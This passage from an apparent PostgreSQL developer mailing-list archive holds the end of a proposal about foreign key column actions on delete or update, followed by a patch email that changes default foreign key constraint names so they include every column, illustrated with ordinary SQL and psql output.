condeletecols  int2[]  pg_attribute.attnum  List of constrained columns to
                                            set on deletion of referenced
                                            record
conupdatecols  int2[]  pg_attribute.attnum  List of constrained columns to
                                            set on update of referenced
                                            record
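
For comparison, the existing columns can already be queried directly, e.g.:

  SELECT conname, conkey, confkey FROM pg_constraint WHERE contype = 'f';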


POSSIBLE GENERALIZATIONS/EXTENSIONS:

The above solution solves the specific problem that I have been facing, but I
see two clear possibilities for how this functionality can be extended.

One, the set of columns that we set to null could be any set of columns in the
table with the constraint, rather than just a subset of columns that make up
the foreign key. This would be useful for columns that are only meaningful if
the foreign key is present. Imagine a timestamp column that indicates when the
foreign key was set and should be cleared when the foreign key is cleared. Or
maybe some columns have been denormalized from the referenced table and those
should be cleared.

While this extension is reasonable, it does add another layer of complexity to
the feature: what happens when one of those columns gets dropped from the
table? Should the entire foreign key be dropped? Should it error? Or should
that column simply be removed from the set of columns that are acted upon? If
the set of columns can only be a subset of the foreign key columns, then this
is already a solved

PATCH: Include all columns in default names for foreign key constraints.

2019-01-12 Thread Paul Martinez
Hello!

I have written a small patch to modify the default names for foreign key
constraints. Currently if the foreign key is composed of multiple columns we
only use the first one in the constraint name. This can lead to similar
constraint names when two foreign keys start with the same column. This sort
of situation may commonly occur in a multi-tenant environment.

> CREATE TABLE users (tenant_id int, id int, PRIMARY KEY (tenant_id, id));
> CREATE TABLE posts (tenant_id int, id int, PRIMARY KEY (tenant_id, id));
> CREATE TABLE comments (
    tenant_id int,
    id int,
    post_id int,
    commenter_id int,
    FOREIGN KEY (tenant_id, post_id) REFERENCES posts,
    FOREIGN KEY (tenant_id, commenter_id) REFERENCES users
  );
> \d comments
 Table "public.comments"

 Foreign-key constraints:
  "comments_tenant_id_fkey" FOREIGN KEY (tenant_id, commenter_id)
      REFERENCES users(tenant_id, id)
  "comments_tenant_id_fkey1" FOREIGN KEY (tenant_id, post_id)
      REFERENCES posts(tenant_id, id)

The two constraints have nearly identical names. With my patch the default names
will include both column names, so we will instead have this output:

 Foreign-key constraints:
  "comments_tenant_id_commenter_id_fkey" FOREIGN KEY (tenant_id, commenter_id)
      REFERENCES users(tenant_id, id)
  "comments_tenant_id_post_id_fkey" FOREIGN KEY (tenant_id, post_id)
      REFERENCES posts(tenant_id, id)

This brings the default names for foreign keys in line with the default names
for indexes. Hopefully an uncontroversial change!

The logic for creating index names is in the function ChooseIndexNameAddition
in src/backend/commands/indexcmds.c. There is also similar logic for creating
names for statistics in ChooseExtendedStatisticNameAddition in
src/backend/commands/statscmds.c.

I pretty much just copied and pasted the implementation from
ChooseIndexNameAddition and placed it in src/backend/commands/tablecmds.c.
The new function is called ChooseForeignKeyConstraintNameAddition. I updated
the comments in indexcmds.c and statscmds.c to also reference this new function.
Each of the three versions takes in the columns in slightly different forms, so
I don't think creating a single implementation of this small bit of logic is
desirable, and I have no idea where such a util function would go.

Regression tests are in src/test/regress/sql/foreign_key.sql. I create two
composite foreign keys on a table, one via the CREATE TABLE statement and the
other in an ALTER TABLE statement. The generated names of the constraints are
then queried from the pg_constraint table.


This is my first submission to Postgres, so I'm not entirely sure what the
protocol is here to get this merged; should I add this patch to the 2019-03
Commitfest?

Happy to hear any feedback!

- Paul Martinez


foreign-key-constraint-names-v1.patch
Description: Binary data